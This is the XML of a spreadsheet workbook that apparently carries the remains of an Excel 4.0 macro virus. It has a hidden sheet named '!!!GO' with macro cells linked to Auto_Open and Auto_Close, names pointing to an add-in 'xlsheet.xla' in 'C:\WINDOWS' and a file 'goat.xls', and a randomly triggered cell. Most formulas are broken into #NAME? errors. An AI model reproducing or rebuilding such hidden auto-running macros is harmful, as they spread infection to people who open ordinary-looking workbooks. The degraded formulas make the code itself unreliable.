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!!!GO" sheetId="1" state="hidden" r:id="rId2"/>
    <sheet name="Sheet1" sheetId="2" state="visible" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName function="false" hidden="false" localSheetId="0" name="activation_feuille" vbProcedure="false">'!!!GO'!$A$38</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="create_xla" vbProcedure="false">0</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="Excel_BuiltIn_Auto_Close" vbProcedure="false">'!!!GO'!$A$103</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="Excel_BuiltIn_Auto_Open" vbProcedure="false">'!!!GO'!$A$2</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="existe" vbProcedure="false">1</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="feuille_base" vbProcedure="false">"xlsheet.xla"</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="GO" vbProcedure="false">'!!!GO'!$A$81</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="i" vbProcedure="false">4</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="liste_classeur" vbProcedure="false">{"Book1","xxx.xls","xlsheet.xla"}</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="noprotect" vbProcedure="false">#REF!</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="nouveau_classeur" vbProcedure="false">"="</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="nouvelle_feuille" vbProcedure="false">"goat.xls"</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="path_xla" vbProcedure="false">"C:\WINDOWS"</definedName>
    <definedName function="false" hidden="false" localSheetId="0" name="protect" vbProcedure="false">'!!!GO'!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uto_ouvrir</t>
  </si>
  <si>
    <t xml:space="preserve">activation_feuille</t>
  </si>
  <si>
    <t xml:space="preserve">protect</t>
  </si>
  <si>
    <t xml:space="preserve">!!!GO</t>
  </si>
  <si>
    <t xml:space="preserve">auto_ferm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ð_._-;\-* #,##0_ð_._-;_-* \-_ð_._-;_-@_-"/>
    <numFmt numFmtId="166" formatCode="_-* #,##0\ _F_-;\-* #,##0\ _F_-;_-* &quot;- &quot;_F_-;_-@_-"/>
    <numFmt numFmtId="167" formatCode="_-* #,##0.00_ð_._-;\-* #,##0.00_ð_._-;_-* \-??_ð_._-;_-@_-"/>
    <numFmt numFmtId="168" formatCode="_-* #,##0.00\ _F_-;\-* #,##0.00\ _F_-;_-* \-??\ _F_-;_-@_-"/>
    <numFmt numFmtId="169" formatCode="_-* #,##0&quot;ð.&quot;_-;\-* #,##0&quot;ð.&quot;_-;_-* &quot;-ð.&quot;_-;_-@_-"/>
    <numFmt numFmtId="170" formatCode="_-* #,##0&quot; F&quot;_-;\-* #,##0&quot; F&quot;_-;_-* &quot;- F&quot;_-;_-@_-"/>
    <numFmt numFmtId="171" formatCode="_-* #,##0.00&quot;ð.&quot;_-;\-* #,##0.00&quot;ð.&quot;_-;_-* \-??&quot;ð.&quot;_-;_-@_-"/>
    <numFmt numFmtId="172" formatCode="_-* #,##0.00&quot; F&quot;_-;\-* #,##0.00&quot; F&quot;_-;_-* \-??&quot; F&quot;_-;_-@_-"/>
    <numFmt numFmtId="173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!!!GO" xfId="20"/>
    <cellStyle name="Comma [0]_!!!GO_1" xfId="21"/>
    <cellStyle name="Comma_!!!GO" xfId="22"/>
    <cellStyle name="Comma_!!!GO_1" xfId="23"/>
    <cellStyle name="Currency [0]_!!!GO" xfId="24"/>
    <cellStyle name="Currency [0]_!!!GO_1" xfId="25"/>
    <cellStyle name="Currency_!!!GO" xfId="26"/>
    <cellStyle name="Currency_!!!GO_1" xfId="27"/>
    <cellStyle name="Normal_!!!GO" xfId="28"/>
    <cellStyle name="Normal_!!!GO_1" xfId="29"/>
    <cellStyle name="Normal_!!!GO_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14"/>
    <col collapsed="false" customWidth="false" hidden="false" outlineLevel="0" max="257" min="3" style="1" width="11.42"/>
  </cols>
  <sheetData>
    <row r="2" customFormat="false" ht="12.8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IF(#NAME!()="xlsheet.xla",TRUE()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IF(INDEX(#NAME?,,#NAME?)="xlsheet.xla",TRUE()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IF(#NAME?&lt;1,TRUE())</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="19" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A19" s="1" t="e">
        <f aca="false">IF(LEFT(#NAME!(),1)&lt;&gt;"C",TRUE()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  <c r="B26" s="3"/>
    </row>
    <row r="27" customFormat="false" ht="14.65" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A27" s="1" t="n">
        <f aca="false">IF(ISERROR(#NAME!()),TRUE())</f>
        <v>1</v>
      </c>
      <c r="B27" s="3"/>
    </row>
    <row r="28" customFormat="false" ht="14.65" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A28" s="1" t="e">
        <f aca="false">#NAME!()</f>
        <v>#NAME?</v>
      </c>
      <c r="B28" s="3"/>
    </row>
    <row r="29" customFormat="false" ht="14.65" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A29" s="1" t="e">
        <f aca="false">#NAME!()</f>
        <v>#NAME?</v>
      </c>
      <c r="B29" s="3"/>
    </row>
    <row r="30" customFormat="false" ht="14.65" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A30" s="1" t="e">
        <f aca="false">#NAME!()</f>
        <v>#NAME?</v>
      </c>
      <c r="B30" s="3"/>
    </row>
    <row r="31" customFormat="false" ht="14.65" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A31" s="1" t="e">
        <f aca="false">#NAME!()</f>
        <v>#NAME?</v>
      </c>
      <c r="B31" s="3"/>
    </row>
    <row r="32" customFormat="false" ht="14.65" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A32" s="1" t="e">
        <f aca="false">#NAME!()</f>
        <v>#NAME?</v>
      </c>
      <c r="B32" s="3"/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8" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A38" s="2" t="s">
        <v>1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n">
        <f aca="false">IF(NOT(ISERROR(#NAME!())),TRUE())</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A47" s="1" t="e">
        <f aca="false">(#NAME?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n">
        <f aca="false">IF(NOT(ISNA(#NAME!())),TRUE())</f>
        <v>1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75" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A60" s="1" t="e">
        <f aca="false">#NAME!()</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="62" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A62" s="2" t="s">
        <v>2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1" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A81" s="2" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="82" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A82" s="4" t="e">
        <f aca="false">#NAME!()</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="83" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A83" s="1" t="n">
        <f aca="true">IF(RAND()*100&gt;98,TRUE())</f>
        <v>0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3" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A103" s="5" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="104" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A104" s="1" t="n">
        <f aca="false">IF(FALSE(),#NAME!())</f>
        <v>0</v>
      </c>
    </row>
    <row r="105" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A105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